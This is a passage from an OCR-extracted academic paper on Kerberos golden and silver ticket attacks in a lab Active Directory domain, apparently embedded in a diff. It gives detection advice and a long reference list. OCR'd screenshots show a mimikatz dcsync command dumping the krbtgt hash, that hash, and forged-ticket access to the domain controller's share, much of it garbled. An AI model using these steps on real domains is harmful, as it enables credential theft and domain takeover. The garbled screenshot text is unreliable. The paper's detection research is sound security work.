+ Transited Senvices:
1612
+ Failure Code
1613
+ Copy
1614
+ Sive Selected Events...
1615
+ Log Name:
1616
+ Security
1617
+ @Refresh
1618
+ Source:
1619
+ Microsoft Windows security
1620
+ Logged
1621
+ 4/10/2022 9:35:33 AM
1622
+ 图 Help
1623
+ Event ID:
1624
+ 4769
1625
+ Task Category
1626
+ Kerberos Service Ticket Operations
1627
+ Levet
1628
+ Information
1629
+ Keyword's:
1630
+ Audit Success
1631
+ User
1632
+ N/A
1633
+ Cemputer
1634
+ WinServer.grippot.com
1635
+ OpCode:
1636
+ Info
1637
+ More Information:
1638
+ Event Log Online HelpO Select mimikatz 2.2.0 x64 (oe.eo)
1639
+ mimikatz #lsadump::dcsync/user:krbtgt/domain:grippot.com
1640
+ DC
1641
+ 'grippot.com'will be the domain
1642
+ TDC
1643
+ winServer.grippot.com'will bethe Dc server
1644
+ TDC
1645
+ "krbtgt'
1646
+ will be the user account
1647
+ [rpc]
1648
+ Service
1649
+ dap
1650
+ [rpe]
1651
+ Authnsvc :
1652
+ GSS NEGOTIATE (9)
1653
+ Object RDN
1654
+ : krbtgt
1655
+ SAM ACCOUNT
1656
+ **
1657
+ SAM Username
1658
+ krbtgt
1659
+ Account
1660
+ Type
1661
+ 30000000
1662
+ USER OBJECT
1663
+ User Account Control
1664
+ 00000202
1665
+ ACCOUNTDISABLE NORMAL ACCOUNT
1666
+ Account expiration
1667
+ Password last change
1668
+ 3/22/20226:31:33 AM
1669
+ Object Security ID
1670
+ S-1-5-21-3521637253-3821103896-1122387918-502
1671
+ Object Relative ID
1672
+ 502
1673
+ Credentials
1674
+ HashNTLM:12d302e5cf0d0e9d1e3d21f7c5ef6187
1675
+ ntim-
1676
+ 12d302e5cf0d0e9d1e3d21f7c5ef6187
1677
+ 1m
1678
+ Q:
1679
+ 86c528a1a699dbc48e0d4bcf32a3e595cCommandPrompt
1680
+ Ticket Flags ex4eeeeeee -> forwardable renewable initial pre authent
1681
+ startTime:4/10/20229:34:02(local)
1682
+ End Time:
1683
+ 4/7/20329:34:02(1oca1)
1684
+ Renew Time:4/7/20329:34:02 (1ocal)
1685
+ Session Key Type: RSADSI RC4-HMAC(NT)
1686
+ Cache Flags: ox1 ->PRIMARY
1687
+ Kdc Called:
1688
+ c:luserslattacker>net useo:llwinserver.grippot.comlcs
1689
+ The command completed successfully
1690
+ t:lUsersattacker>o:
1691
+ o:l>dir
1692
+ Volume in drive o has no label
1693
+ Volume Serial Number is 8873-AAA2
1694
+ Directory of o:1
1695
+ 03/22/2022
1696
+ 06:47AM
1697
+ <DIR>
1698
+ inetpub
1699
+ 04/05/2022
1700
+ 01:15PM
1701
+ <DIR>
1702
+ PerfLogs
1703
+ 03/22/2022
1704
+ 06:47AM
1705
+ <DIR>
1706
+ Program Files
1707
+ 03/22/2022
1708
+ 06:47AM
1709
+ <DIR>
1710
+ Program Files
1711
+ (x86)
1712
+ 03/22/2022
1713
+ 06:44 AM
1714
+ <DIR>
1715
+ Users
1716
+ 04/05/2022
1717
+ 01:15PM
1718
+ <DIR>
1719
+ Windows
1720
+ e File(s)
1721
+ ebytes
1722
+ 6 Dir(s)
1723
+ 3,342,397,440 bytesfree
1724
+ by the Administrator account on 4/10/22 at 9:35 am.
1725
+ There are a couple of things that are suspicious about
1726
+ this log. First, there is no hostname for the client. If
1727
+ the client were a part of the domain, their hostname
1728
+ would appear in the log. Instead, just the IP address is
1729
+ shown. Also, more importantly, there is no record of
1730
+ a 4768 security event. This is the event that logs the
1731
+ request of a TGT. This could be a good indicator that
1732
+ the user has forged their own TGT, and never
1733
+ retrieved one from the domain controller.
1734
+ Since the silver ticket attack does not involve the
1735
+ domain controller, it is harder to detect. In fact, for
1736
+ this experiment, it was not detected at all. The only
1737
+ significant logs generated were on the SQL server for
1738
+ login (4624) and log out (4634). Since we
1739
+ impersonated the bross user account for the silver
1740
+ ticket attack, these logs look normal. Typically,
1741
+ though, if an attacker is using a username that doesn’t
1742
+ exist, these logs can be useful.
1743
+
1744
+ V. ANALYSIS AND DISCUSSION
1745
+ Although we weren’t as successfully detecting
1746
+ these attacks in the virtual environment, there are
1747
+ several ways in which ticket forgery can be detected
1748
+ in the real world.
1749
+ Many of these detection methods involve
1750
+ analyzing the tickets to look for anomalies. This can
1751
+ include things such as non-existent usernames,
1752
+ weaker encryption types, and suspicious privileges.
1753
+ The problem with this is that a smart attacker can
1754
+ easily correct these parameters and forge tickets that
1755
+ look completely legitimate. The only parameter that
1756
+ an attacker would be unlikely to change is the ticket
1757
+ lifetime. The default MaxTicketAge for legitimate
1758
+ tickets is 10 hours, whereas tickets created with
1759
+ Mimikatz have a default of 10 days [17]. We can see
1760
+ this in Figure 25 with the golden ticket that we
1761
+ created. Its lifetime is from 4/10/2022 to 4/7/2032.
1762
+ This also holds true for the silver ticket created in
1763
+ Figure 21. An attacker could easily change the
1764
+ lifetime to 10 hours to be stealthier, however, they
1765
+ likely wouldn’t. This is because forged Kerberos
1766
+ tickets, and forged TGTs in particular, are used for
1767
+ persistence within a network. Therefore, an attacker
1768
+ would want their ticket to last as long as possible so
1769
+ that they can continue to gain access to systems even
1770
+ after they are kicked off. Thus, a detection method
1771
+ that looks at the MaxTicketAge parameter of
1772
+ Kerberos tickets would be effective in detecting these
1773
+ types of attacks.
1774
+ Overall, it would be advisable to implement a
1775
+ centralized log management system [18] so that all
1776
+ the logs generated across the network are stored in
1777
+ one place. Since ticket forgery attacks often generate
1778
+ logs across many systems, this would make analysis
1779
+ easier.
1780
+ VI. CONCLUSION
1781
+ As long as organizations continue to employ
1782
+ Active Directory Domain Services, ticket forgery
1783
+ attacks against the Kerberos authentication protocol
1784
+ will remain a threat. These attacks are complex and
1785
+ require a deep understanding of both Active
1786
+ Directory and Kerberos. They exploit vulnerabilities
1787
+ within the Kerberos authentication protocol and
1788
+ allow potential attackers to impersonate users and
1789
+ privileges within the network. The golden ticket
1790
+ attack involves forging a TGT that can be used to
1791
+ access any services on the network. The silver ticket
1792
+ attack involves forging a TGS ticket that can be used
1793
+ to access a specific service on the network. To
1794
+ demonstrate these attacks, we created a virtual
1795
+ environment that simulated a real organization. This
1796
+ included a domain controller to run Active Directory
1797
+ Domain Services, a SQL server, and client machines.
1798
+ We then performed these attacks within the virtual
1799
+ environment to observe their functioning.
1800
+ Specifically, the Windows security logs were
1801
+ analyzed to detect the forged tickets in the network.
1802
+ As shown, these attacks are difficult to detect once
1803
+ the tickets have been forged. This is especially true
1804
+ for the silver ticket attack which does not need to
1805
+ connect to the domain controller.
1806
+ Regardless, both attacks are dangerous and should be
1807
+ recognized as a serious threat by corporations. It
1808
+ would be advisable to implement a powerful log
1809
+ collecting service to gain additional visibility into the
1810
+ network and catch forged tickets before they cause
1811
+ serious damage.
1812
+ Future work includes integrating the proposed
1813
+ approaches with our cybersecurity framework [23-57]
1814
+ to detect the silver ticket attack in the 5G networks.
1815
+
1816
+ REFERENCES
1817
+ [1]
1818
+ B. Krebs, “Report: Recent 10x Increase in Cyberattacks on
1819
+ Ukraine,” krebsonsecurity.com, March 2022. [Online].
1820
+ Available:
1821
+ https://krebsonsecurity.com/2022/03/report-
1822
+ recent-10x-increase-in-cyberattacks-on-ukraine/#more- 58886.
1823
+ [Accessed April 1, 2022].
1824
+ [2]
1825
+ “Active Directory Domain Services,” docs.microsoft.com,
1826
+ July
1827
+ 2021.
1828
+ [Online].
1829
+ Available:
1830
+ https://docs.microsoft.com/en-us/windows-
1831
+ server/identity/ad-ds/active-directory-domain-services.
1832
+ [Accessed April 1, 2022].
1833
+ [3]
1834
+ S. Krishnamoorthi, “Active Directory Holds the Keys to your
1835
+ Kingdom, but is it Secure?” frost.com, March 2020. [Online].
1836
+ Available: https://www.frost.com/frost- perspectives/active-
1837
+ directory-holds-the-keys-to-your- kingdom-but-is-it-secure/.
1838
+ [Accessed April 1, 2022].
1839
+ [4]
1840
+ “MIT Kerberos Documentation,” web.mit.edu. [Online].
1841
+ Available:
1842
+ https://web.mit.edu/kerberos/krb5-latest/doc/.
1843
+ [Accessed April 1, 2022].
1844
+ [5]
1845
+ “1.3.2 Kerberos Network Authentication Service (V5)
1846
+ Synopsis,”
1847
+ docs.microsoft.com,
1848
+ April
1849
+ 2021.
1850
+ [Online].
1851
+ Available:
1852
+ https://docs.microsoft.com/en-
1853
+ us/openspecs/windows_protocols/ms-kile/b4af186e-b2ff-
1854
+ 43f9-b18e-eedb366abf13. [Accessed April 1, 2022].
1855
+ [6]
1856
+ E. Pérez, “Kerberos (I): How does Kerberos work? –
1857
+ Theory,”, March 2019. https://www.tarlogic.com/blog/how-
1858
+ kerberos-works/. [Accessed April 1, 2022].
1859
+
1860
+
1861
+ [7]
1862
+ “Silver & Golden Tickets,” hackndo.com, January 2020.
1863
+ [Online].
1864
+ Available:
1865
+ https://en.hackndo.com/kerberos-
1866
+ silver- golden-tickets/. [Accessed April 3, 2022].
1867
+ [8]
1868
+ “Welcome to VirtualBox.org!” virtualbox.org, April 2022.
1869
+ [Online]. Available: https://www.virtualbox.org/. [Accessed
1870
+ April 3, 2022].
1871
+ [9]
1872
+ B. Delpy, Mimikatz, GitHub Repository. [Online].
1873
+ Available:
1874
+ https://github.com/gentilkiwi/mimikatz.
1875
+ [Accessed April 3, 2022].
1876
+ [10]
1877
+ “Mimikatz”, offensive-security.com. [Online]. Available:
1878
+ https://www.offensive-security.com/metasploit-
1879
+ unleashed/mimikatz/. [Accessed April 7, 2022].
1880
+ [11]
1881
+ “Steal or Forge Kerberos Tickets: Kerberoasting”,
1882
+ [12]
1883
+ mitre.org. [Online]. Available: https://attack.mitre.org
1884
+ [13]
1885
+ /techniques/T1558/003/. [Accessed April 7, 2022].
1886
+ [14]
1887
+ L. Kotlaba, S. Buchovecká, R. Lórencz, “Active Directory
1888
+ Kerberoasting
1889
+ Attack:
1890
+ Monitoring
1891
+ and
1892
+ Detection
1893
+ Techniques”,
1894
+ Proceedings
1895
+ of
1896
+ the
1897
+ 6th
1898
+ International
1899
+ Conference on Information Systems Security and Privacy
1900
+ (ICISSP 2020), pages 432-439, 2022. [Online]. Available:
1901
+ https://www.scitepress.org/Papers/2020/89550/89550.pdf.
1902
+ [Accessed April 7, 2022].
1903
+ [15]
1904
+ T. Medin, kerberoast, GitHub Repository. [Online].
1905
+ Available: https://github.com/nidem/kerberoast. [Accessed
1906
+ April 7, 2022].
1907
+ [16]
1908
+ “Security identifiers”, docs.microsoft.com, December 2021.
1909
+ [Online].
1910
+ Available:
1911
+ https://docs.microsoft.com/en-
1912
+ us/windows/security/identity-protection/access-
1913
+ control/security-identifiers. [Accessed April 7, 2022].
1914
+ [17]
1915
+ J. Warren, “Extracting User Password Data with Mimikatz
1916
+ DCSync”, stealthbits.com, July 2017. [Online]. Available:
1917
+ https://stealthbits.com/blog/extracting-user-password-data-
1918
+ with-mimikatz-dcsync/. [Accessed April 7, 2022].
1919
+ [18]
1920
+ “View the security event log”, docs.microsoft.com,
1921
+ November
1922
+ 2021.
1923
+ [Online].
1924
+ Available:
1925
+ https://docs.microsoft.com/en-us/windows/security/threat-
1926
+ protection/auditing/view-the-security-event-log. [Accessed
1927
+ April 7, 2022].
1928
+ [19]
1929
+ C. D. Motero, J. R. B. Higuera, J. B. Higuera, J. A. S.
1930
+ Montalvo and N. G. Gómez, "On Attacking Kerberos
1931
+ Authentication Protocol in Windows Active Directory
1932
+ Services: A Practical Survey," in IEEE Access, vol. 9, pp.
1933
+ 109289-109319, 2021, doi:
1934
+ [20]
1935
+ 10.1109/ACCESS.2021.3101446. Available:
1936
+ [21]
1937
+ https://ieeexplore.ieee.org/
1938
+ abstract/document/9501961.
1939
+ [Accessed April 7, 2022].
1940
+ [22]
1941
+ J. Morgan, “What is Centralized Log Management (CLM)”,
1942
+ missioncloud.com.
1943
+ [Online].
1944
+ Available:
1945
+ https://www.missioncloud.com/blog/what-is-centralized-
1946
+ log-management-clm. [Accessed April 9, 2022].
1947
+ [23]
1948
+ Hisham A. Kholidy, “Multi-Layer Attack Graph
1949
+ Analysis in the 5G Edge Network Using a Dynamic
1950
+ Hexagonal Fuzzy Method”,. Sensors 2022, 22, 9.
1951
+ [24]
1952
+ Hisham A. Kholidy, “Multi-Layer Attack Graph
1953
+ Analysis in the 5G Edge Network Using a Dynamic
1954
+ Hexagonal
1955
+ Fuzzy
1956
+ Method”,
1957
+ Sensor
1958
+ Journal.
1959
+ Sensors 2022, 22, 9. https://doi.org/10.3390/s22010009.
1960
+ [25]
1961
+ Hisham A. Kholidy, Andrew Karam, James L. Sidoran,
1962
+ Mohammad A. Rahman, "5G Core Security in Edge
1963
+ Networks: A Vulnerability Assessment Approach", the
1964
+ 26th
1965
+ IEEE
1966
+ Symposium
1967
+ on
1968
+ Computers
1969
+ and
1970
+ Communications (IEEE ISCC 2021), Athens, Greece,
1971
+ September
1972
+ 5-8,
1973
+ 2021.
1974
+ https://ieeexplore.ieee.org/document/9631531
1975
+ [26]
1976
+ Hisham A. Kholidy, “A Triangular Fuzzy based
1977
+ Multicriteria Decision Making Approach for Assessing
1978
+ Security Risks in 5G Networks”, December 2021,
1979
+ Preprint={2112.13072}, arXiv.
1980
+ [27]
1981
+ Kholidy, H.A., Fabrizio Baiardi, "CIDS: A framework
1982
+ for Intrusion Detection in Cloud Systems", in the 9th Int.
1983
+ Conf. on Information Technology: New Generations
1984
+ ITNG 2012, April 16-18, Las Vegas, Nevada, USA.
1985
+ http://www.di.unipi.it/~hkholidy/projects/cids/
1986
+ [28]
1987
+ Kholidy, H.A. (2020), "Autonomous mitigation of cyber
1988
+ risks
1989
+ in
1990
+ the
1991
+ Cyber–Physical
1992
+ Systems",
1993
+ doi:10.1016/j.future.2020.09.002, Future
1994
+ Generation
1995
+ Computer Systems,Volume 115, 2021, Pages 171-187,
1996
+ ISSN
1997
+ 0167-739X,
1998
+ https://doi.org/10.1016/j.future.2020.09.002.
1999
+ [29]
2000
+ Hisham
2001
+ A.
2002
+ Kholidy,
2003
+ Abdelkarim
2004
+ Erradi,
2005
+ Sherif
2006
+ Abdelwahed, Fabrizio Baiardi, "A risk mitigation
2007
+ approach for autonomous cloud intrusion response
2008
+ system",
2009
+ Computing
2010
+ Journal,
2011
+ Springer,
2012
+ DOI:
2013
+ 10.1007/s00607-016-0495-8, June 2016. (Impact factor:
2014
+ 2.220). https://link.springer.com/article/10.1007/s00607-
2015
+ 016-0495-8
2016
+ [30]
2017
+ Hisham A. Kholidy, “Detecting impersonation attacks in
2018
+ cloud computing environments using a centric user
2019
+ profiling
2020
+ approach”,
2021
+ Future
2022
+ Generation
2023
+ Computer
2024
+ Systems, Vol 115, 17, December 13, 2020, ISSN 0167-
2025
+ 739X.
2026
+ [31]
2027
+ Kholidy, H.A., Baiardi, F., Hariri, S., et al.: “A
2028
+ hierarchical cloud intrusion detection system: design and
2029
+ evaluation”, Int. J. Cloud Comput., Serv. Archit.
2030
+ (IJCCSA), 2012, 2, pp. 1–24.
2031
+ [32]
2032
+ Kholidy, H.A., “Detecting impersonation attacks in cloud
2033
+ computing environments using a centric user profiling
2034
+ approach”, Future Generation Computer Systems, Volume
2035
+ 115, issue 17, December 13, 2020, Pages 171-187, ISSN
2036
+ 0167-739X, https://doi.org/10.1016/j.future.2020.12.
2037
+ [33]
2038
+ Kholidy,
2039
+ Hisham
2040
+ A.:
2041
+ 'Correlation-based
2042
+ sequence
2043
+ alignment models for detecting masquerades in cloud
2044
+ computing', IET Information Security, 2020, 14, (1), p.39-
2045
+ 50, DOI: 10.1049/iet-ifs.2019.0409.
2046
+ [34]
2047
+ Kholidy, H.A., Abdelkarim Erradi, “A Cost-Aware Model
2048
+ for
2049
+ Risk
2050
+ Mitigation
2051
+ in
2052
+ Cloud
2053
+ Computing
2054
+ SystemsSuccessful
2055
+ accepted
2056
+ in
2057
+ 12th
2058
+ ACS/IEEE
2059
+ International Conference on Computer Systems and
2060
+ Applications
2061
+ (AICCSA),
2062
+ Marrakech,
2063
+ Morocco,
2064
+ November, 2015.
2065
+ [35]
2066
+ A H M Jakaria, Mohammad A. Rahman, Alvi A. Khalil,
2067
+ Hisham A. Kholidy, Matthew Anderson et al “Trajectory
2068
+ Synthesis for a UAV Swarm Based on Resilient Data
2069
+ Collection Objectives", IEEE Transactions on Network
2070
+ and Service Management, November, 2022 doi:
2071
+ 10.1109/TNSM.2022.3216804.
2072
+ [36]
2073
+ Hisham A. Kholidy, Andrew Karam, James Sidoran, et al.
2074
+ “Toward Zero Trust Security in 5G Open Architecture
2075
+ Network Slices”, the 40th IEEE Military Conference
2076
+ (MILCOM), San Diego, CA, USA, November 29, 2022.
2077
+ [37]
2078
+ Hisham A. Kholidy, Riaad Kamaludeen “An Innovative
2079
+ Hashgraph-based Federated Learning Approach for Multi
2080
+ Domain 5G Network Protection”, IEEE Future Networks
2081
+ (5G World Forum), Montreal, Canada, October 2022.
2082
+ [38]
2083
+ Hisham A. Kholidy, Andrew Karam, Jeffrey H. Reed,
2084
+ Yusuf Elazzazi, "An Experimental 5G Testbed for Secure
2085
+ Network Slicing Evaluation", IEEE Future Networks (5G
2086
+ World Forum), Montreal, Canada, October 2022.
2087
+ [39]
2088
+ Hisham A. Kholidy, Salim Hariri, Pratik Satam, Safwan
2089
+ Ahmed Almadani “Toward an Experimental Federated 6G
2090
+ Testbed: A Federated learning Approach”, the 13th Int.
2091
+ Conf. on Information and Communication Technology
2092
+ Convergence (ICTC), Jeju Island, Korea, October 9, 2022.
2093
+ [40]
2094
+ NI Haque, MA Rahman, D Chen, Hisham Kholidy,
2095
+ “BIoTA: Control-Aware Attack Analytics for Building
2096
+ Internet of Things”, 2021 18th Annual IEEE International
2097
+ Conference on Sensing, Communication
2098
+ [41]
2099
+ Kholidy, H.A., Ali T., Stefano I., et al, “Attacks Detection
2100
+ in SCADA Systems Using an Improved Non-Nested
2101
+
2102
+
2103
+ Generalized Exemplars Algorithm", the 12th IEEE
2104
+ International Conference on Computer Engineering and
2105
+ Systems (ICCES 2017), December 19-20, 2017.
2106
+ [42]
2107
+ Qian Chen, Kholidy, H.A., Sherif Abdelwahed, John
2108
+ Hamilton, "Towards Realizing a Distributed Event and
2109
+ Intrusion Detection System", the Int. Conf. on Future
2110
+ Network Systems and Security, Florida, USA, Aug
2111
+ 2017.
2112
+ [43]
2113
+ Hisham
2114
+ A.
2115
+ Kholidy,
2116
+ Abdelkarim
2117
+ Erradi,
2118
+ Sherif
2119
+ Abdelwahed, Abdulrahman Azab, “A Finite State
2120
+ Hidden Markov Model for Predicting Multistage Attacks
2121
+ in Cloud Systems", in the 12th IEEE Int. Conf. on
2122
+ Dependable, Autonomic and Secure Computing, China,
2123
+ August 2014.
2124
+ [44]
2125
+ Ferrucci, R., & Kholidy, H. A. (2020, May). A Wireless
2126
+ Intrusion Detection for the Next Generation (5G)
2127
+ Networks”, Master’s Thesis, SUNY poly.
2128
+ [45]
2129
+ Rahman, A., Mahmud, M., Iqbal, T., Saraireh, L.,
2130
+ Hisham A. Kholidy., et. al. (2022). Network anomaly
2131
+ detection in 5G networks. Mathematical Modelling of
2132
+ Engineering Problems, Vol. 9, No. 2, pp. 397-404.
2133
+ https://doi.org/10.18280/mmep.090213
2134
+ [46]
2135
+ Hisham Kholidy, “State Compression and Quantitative
2136
+ Assessment Model for Assessing Security Risks in the
2137
+ Oil
2138
+ and
2139
+ Gas
2140
+ Transmission
2141
+ Systems”,
2142
+ doi
2143
+ :
2144
+ 10.48550/ARXIV.2112.14137,
2145
+ https://arxiv.org/abs/2112.14137}, December 2021.
2146
+ [47]
2147
+ Hisham A. Kholidy, “Correlation Based Sequence
2148
+ Alignment Models For Detecting Masquerades in
2149
+ Cloud Computing”, IET Information Security Journal,
2150
+ DOI: 10.1049/iet-ifs.2019.0409, Sept. 2019 (ISI Impact
2151
+ Factor(IF):
2152
+ 1.51)
2153
+ https://digital-
2154
+ library.theiet.org/content/journals/10.1049/iet-
2155
+ ifs.2019.0409
2156
+ [48]
2157
+ Hisham A. Kholidy, “An Intelligent Swarm based
2158
+ Prediction Approach for Predicting Cloud Computing
2159
+ User Resource Needs”, the Computer Communications
2160
+ Journal,
2161
+ December
2162
+ 19
2163
+ (ISI
2164
+ IF:
2165
+ 2.766).
2166
+ https://www.sciencedirect.com/science/article/abs/pii/S0
2167
+ 140366419303329
2168
+ [49]
2169
+ Hisham A. Kholidy, Abdelkarim Erradi, “VHDRA: A
2170
+ Vertical and Horizontal Dataset Reduction Approach for
2171
+ Cyber-Physical
2172
+ Power-Aware
2173
+ Intrusion
2174
+ Detection
2175
+ Systems”, SECURITY AND COMMUNICATION
2176
+ NETWORKS Journal (ISI IF: 1.376), March 7, 2019.
2177
+ vol.
2178
+ 2019,
2179
+ Article
2180
+ ID
2181
+ 6816943,
2182
+ 15
2183
+ pages. https://doi.org/10.1155/2019/6816943.
2184
+ [50]
2185
+ Hisham A. Kholidy, Hala Hassan, Amany Sarhan,
2186
+ Abdelkarim
2187
+ Erradi,
2188
+ Sherif
2189
+ Abdelwahed,
2190
+ "QoS
2191
+ Optimization for Cloud Service Composition Based on
2192
+ Economic Model", Book Chapter in the Internet of
2193
+ Things. User-Centric IoT, Volume 150 of the series
2194
+ Lecture Notes of the Institute for Computer Sciences,
2195
+ Social
2196
+
2197
+ Informatics
2198
+ and
2199
+
2200
+ Telecommunications
2201
+ Engineering pp 355-366, June 2015.
2202
+ [51]
2203
+ Hisham A. Kholidy, Alghathbar Khaled s., “Adapting
2204
+ and accelerating the Stream Cipher Algorithm RC4
2205
+ using Ultra Gridsec and HIMAN and use it to secure
2206
+ HIMAN Data”, Journal of Information Assurance and
2207
+ Security (JIAS), vol. 4 (2009)/ issue 4, pp 274-283,
2208
+ 2009. (Indexed by INSPEC, Scopus, Pubzone, Computer
2209
+ Information System Abstracts, MathSci).
2210
+ [52]
2211
+ Hisham A. Kholidy, “Towards A Scalable Symmetric
2212
+ Key Cryptographic Scheme: Performance Evaluation
2213
+ and Security Analysis”, IEEE International Conference
2214
+ on Computer Applications & Information Security
2215
+ (ICCAIS), Riyadh, Saudi Arabia, May 1-3, 2019.
2216
+ https://ieeexplore.ieee.org/document/8769482
2217
+ [53]
2218
+ Samar SH. Haytamy, Hisham A. Kholidy, Fatma A.
2219
+ “ICSD: Integrated Cloud Services Dataset”, Springer,
2220
+ Lecture Note in Computer Science, ISBN 978-3-319-
2221
+ 94471-5, https://doi.org/10.1007/978-3-319-94472-2.
2222
+ [54]
2223
+ Stefano Iannucci, Hisham A. Kholidy Amrita Dhakar
2224
+ Ghimire, Rui Jia, Sherif Abdelwahed, Ioana Banicescu,
2225
+ “A
2226
+ Comparison
2227
+ of
2228
+ Graph-Based
2229
+ Synthetic
2230
+ Data
2231
+ Generators for Benchmarking Next-Generation Intrusion
2232
+ Detection Systems”, IEEE Cluster 2017, Sept 5 2017,
2233
+ Hawaii, USA.
2234
+ [55]
2235
+ Mustafa, F.M., Kholidy, H.A., Sayed, A.F. et al. Enhanced
2236
+ dispersion reduction using apodized uniform fiber Bragg
2237
+ grating for optical MTDM transmission systems. Opt
2238
+ Quant
2239
+ Electron 55,
2240
+ 55
2241
+ (2023).
2242
+ https://doi.org/10.1007/s11082-022-04339-7
2243
+ [56]
2244
+ Abuzamak, M., & Kholidy, H. (2022). UAV Based 5G
2245
+ Network:
2246
+ A
2247
+ Practical
2248
+ Survey
2249
+ Study. arXiv. https://doi.org/10.48550/arXiv.2212.13329
2250
+ [57]
2251
+ Abuzamak, M., & Kholidy, H. (2022). UAV Based 5G
2252
+ Network:
2253
+ A
2254
+ Practical
2255
+ Survey
2256
+ Study. arXiv. https://doi.org/10.48550/arXiv.2212.13329
2257
+
59AyT4oBgHgl3EQfQfYL/content/tmp_files/load_file.txt ADDED
The diff for this file is too large to render. See raw diff
 
59AzT4oBgHgl3EQfvP0x/content/tmp_files/2301.01702v1.pdf.txt ADDED
@@ -0,0 +1,1462 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
